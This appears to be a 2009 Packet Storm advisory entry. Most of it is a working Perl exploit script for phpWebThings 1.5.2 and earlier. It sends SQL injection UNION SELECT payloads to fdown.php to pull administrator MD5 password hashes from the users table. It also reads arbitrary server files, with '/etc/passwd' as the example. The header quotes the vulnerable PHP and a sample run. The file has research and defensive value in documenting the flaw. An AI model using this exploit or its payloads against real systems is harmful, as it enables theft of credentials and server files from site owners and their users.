phpWebThings 1.5.2 MD5 Hash Retrieval

2009-06-12T00:00:00
ID PACKETSTORM:78306
Type packetstorm
Reporter StAkeR
Modified 2009-06-12T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
  
###################################################################################################   
# phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Remote Exploit #   
# #   
# by staker #   
# ------------------------------ #   
# mail: staker[at]hotmail[dot]it #   
# url: http://phpwebthings.nl #   
# ------------------------------ #  
# #   
# NOTE: #  
# 1. it works regardless of php.ini settings #  
# 2. wt_config.php contains mysql login #  
# #  
# short explanation: #  
# ---------------------------------------------------- #  
# phpWebThings contains a flaw that allows an attacker #  
# to carry out an SQL injection attack. The issue is #  
# due to the fdown.php script not properly sanitizing #  
# user-supplied input to the 'id' variable. This may #  
# allow an attacker to inject or manipulate #  
# SQL queries in the backend database (php.ini indep) #  
# ---------------------------------------------------- #  
# #  
# [file: fdown.php] #  
# ------------------------------------ #  
# #  
# <?php #  
# include_once("core/main.php"); #  
# #  
# $ret = db_query("select file from {$config["prefix"]}_forum_msgs where cod={$_REQUEST["id"]}"); #  
# $row = db_fetch_array($ret); #  
# header('HTTP/1.1 200 OK'); #  
# header('Date: ' . date("D M j G:i:s T Y")); #  
# header('Last-Modified: ' . date("D M j G:i:s T Y")); #  
# header("Content-Type: application/force-download"); #  
# header("Content-Lenght: " . (string)(filesize("var/forumfiles/{$row["file"]}"))); #  
# header("Content-Transfer-Encoding: Binary"); #  
# header("Content-Disposition: attachment; filename={$row["file"]}"); #  
# readfile("var/forumfiles/{$row["file"]}"); #  
# #  
# ?> #  
# #  
# ------------------------------------- #  
# #  
# yeat@snippet:~/Desktop$ perl a.pl localhost/cms -c 1 #  
# [*--------------------------------------------------------------------*] #  
# [* phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Exploit *] #  
# [*--------------------------------------------------------------------*] #  
# [* Usage: perl web.pl [target + path] [OPTIONS] *] #  
# [* *] #  
# [* Options: *] #  
# [* [files] -d ../../../../../../etc/passwd *] #  
# [* [hash.] -c user_id *] #  
# [* [table] -t set a table prefix (default: wt) *] #  
# [*--------------------------------------------------------------------*] #  
# [* MD5 Hash: f2c79ad3d1f03ba266dc0a85e1266671 #  
# #  
# ---------------------------------------------------------- #  
# Today is: 12 June 2009 #  
# Location: Italy,Turin. #   
# http://www.youtube.com/watch?v=E78BGajeuAI&feature=related #  
# ---------------------------------------------------------- #  
###################################################################################################  
  
use LWP::UserAgent;  
use Getopt::Long;  
  
&phpWebThings::init;  
  
my ($files,$admin,$ua_lib,$domain,$table);  
  
$domain = $ARGV[0] || exit(0);  
  
  
$ua_lib = LWP::UserAgent->new(  
timeout => 5,  
max_redirect => 0,  
agent => 'Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)',  
) || die $!;   
  
GetOptions(  
'p=s' => \$proxy,  
'd=s' => \$files,  
'c=i' => \$admin,  
't=s' => \$table,  
);  
  
  
die(&phpWebThings::Exploit);  
  
  
sub phpWebThings::Exploit()  
{  
return Disclose::File($files) if defined $files;  
return Retrieve::Hash($admin) if defined $admin;  
}   
  
  
sub Disclose::File  
{  
my $filename = $_[0] || die $!;  
  
my $keywords = "\x2F\x66\x64\x6F\x77\x6E\x2E\x70\x68\x70";  
  
my $response = $ua_lib->post(parse::URL($domain.$keywords),  
[ id => "1/**/union/**/select/**/0x".Hex::convert($filename)."#" ]);  
  
if ($response->status_line =~ /^(302|200|301)/) {  
return $response->content;  
}  
else {  
return $response->as_string;  
}   
}  
  
sub Retrieve::Hash()  
{  
my $user_id = $_[0] || die $!;  
  
my $keywords = "\x2F\x66\x64\x6F\x77\x6E\x2E\x70\x68\x70";   
  
my $prefix = (defined $table) ? $table : 'wt';  
  
my $response = $ua_lib->post(parse::URL($domain.$keywords),  
[ id => "1 UNION SELECT password FROM ${prefix}_users WHERE uid=$user_id#" ]);   
  
if ($response->status_line =~ /^(302|200|301)/)   
{  
if ($response->content =~ /([0-9a-f]{32})/) {  
return "[* MD5 Hash: $1\n";  
}   
}  
else {  
return $response->as_string;  
}   
}   
  
  
sub Hex::convert()  
{  
my $string = shift @_ || die $!;  
  
return unpack("H*",$string);  
}   
  
  
sub parse::URL()  
{  
my $string = shift @_ || die($!);  
  
if ($string !~ /^http:\/\/?/i) {  
$string = 'http://'.$string;  
}  
  
return $string;  
  
}  
  
  
  
sub phpWebThings::init  
{  
print "[*--------------------------------------------------------------------*]\n".  
"[* phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Exploit *]\n".  
"[*--------------------------------------------------------------------*]\n".   
"[* Usage: perl web.pl [target + path] [OPTIONS] *]\n".  
"[* *]\n".  
"[* Options: *]\n".  
"[* [files] -d ../../../../../../etc/passwd *]\n".  
"[* [hash.] -c user_id *]\n".  
"[* [table] -t set a table prefix (default: wt) *]\n".  
"[*--------------------------------------------------------------------*]\n";  
}   
  
  
  
`